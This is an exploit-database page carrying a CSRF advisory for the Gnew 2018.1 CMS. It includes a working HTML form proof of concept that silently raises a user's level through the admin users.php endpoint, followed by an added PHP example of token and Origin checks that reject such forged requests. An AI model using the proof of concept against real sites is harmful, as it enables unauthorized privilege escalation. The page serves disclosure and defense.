0day.today - Biggest Exploit Database in the World.
Gnew 2018.1 - Cross-Site Request Forgery Vulnerability
# Exploit Title: Gnew 2018.1 - Cross-Site Request Forgery
# Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT
# Vendor website : http://gnew.xyz/
# Software download : http://www.gnew.xyz/pages/download.php
# Version: 2018.1
# Tested on: Windows 10 Home x64 / Kali Linux

Product description :
Gnew is a simple content management system (CMS) written in PHP and using a database server (MySQL, PostgreSQL or SQLite) for storage. It is fully customizable because it uses a system of templates and supports multiple languages.

Description :
A vulnerability has been discovered in Gnew, which can be exploited by malicious people to conduct cross-site request forgery attacks. This can be used to get a privilege escalation on the targeted application.

POC :
------------------------------------ HTML--------------------------------------
<form action="http://Target/gnew/admin/users.php " method="POST">
<input type="hidden" name="_method" value="POST"/>
<input type="hidden" name="user_name" value="test2"/>
<input type="hidden" name="user_level" value="4"/>
<input type="hidden" name="user_email" value="gnewtest@yopmail.com"/>
<input type="hidden" name="user_show_email" value="0"/>
<input type="hidden" name="user_day" value="0"/>
<input type="hidden" name="user_month" value="0"/>
<input type="hidden" name="user_month" value="0"/>
<input type="hidden" name="user_language" value="english"/>
<input type="hidden" name="user_template" value="clean"/>
<input type="hidden" name="user_date_format" value="D,+M+jS+Y,+g:i+a"/>
<input type="hidden" name="user_date_offset" value="0"/>
<input type="hidden" name="user_avatar" value=""/>
<input type="hidden" name="user_date_offset" value="0"/>
<input type="hidden" name="user_avatar" value="./../images/avatars/empty.png"/>
<input type="hidden" name="user_id" value="2"/>
<input type="hidden" name="user_level_old" value="1"/>
<input type="hidden" name="user_name_old" value="test2"/>
<input type="hidden" name="edit_user" value="Éditer"/>
<input type="submit" value="CSRF This"/></form>
------------------------------------ HTML END--------------------------------------

# 0day.today [2024-07-05] #
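The form above is accepted because nothing in the request proves it came from the CMS's own admin page. The following is an added example, not code from the advisory or from Gnew: a synchronizer-token plus Origin check of the kind that would reject it. The function names, the `csrf_token` field name and the `cms.example` / `other.example` origins are assumptions made for illustration.

```php
<?php
// Added example, not Gnew code: csrf_token(), csrf_field(), csrf_ok() and the
// "csrf_token" field name are hypothetical. Arrays stand in for $_SESSION,
// $_POST and $_SERVER so the file runs from the CLI.

// Return the per-session token, creating it on first use.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to emit inside every state-changing admin form.
function csrf_field(array &$session): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES) . '"/>';
}

// Accept a POST only if it carries the session's token and, when the browser
// sent an Origin header, that origin is the site's own.
function csrf_ok(array $session, array $post, array $server, string $siteOrigin): bool {
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $siteOrigin) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $sent = $post['csrf_token'] ?? '';
    return is_string($expected) && $expected !== ''
        && is_string($sent) && hash_equals($expected, $sent);
}

// Constructed sample data: one admin session and two POST bodies.
$site = 'https://cms.example';
$session = [];
$token = csrf_token($session);
$forged = ['user_id' => '2', 'user_level' => '4', 'edit_user' => 'Éditer']; // PoC-style body, no token
$legit = $forged + ['csrf_token' => $token]; // body from a form built with csrf_field()

$cases = [
    'cross-site form, no token' => [$forged, ['HTTP_ORIGIN' => 'https://other.example']],
    'token present, foreign Origin' => [$legit, ['HTTP_ORIGIN' => 'https://other.example']],
    'same-site form with token' => [$legit, ['HTTP_ORIGIN' => $site]],
];
foreach ($cases as $name => [$post, $server]) {
    // In a real handler a false result should end the request with HTTP 403
    // before any user row is modified.
    printf("%-32s %s\n", $name, csrf_ok($session, $post, $server, $site) ? 'accepted' : 'rejected');
}
```

In a real handler the check belongs at the top of every state-changing POST branch, including the one triggered by `edit_user`. Setting the session cookie's SameSite attribute adds a second layer.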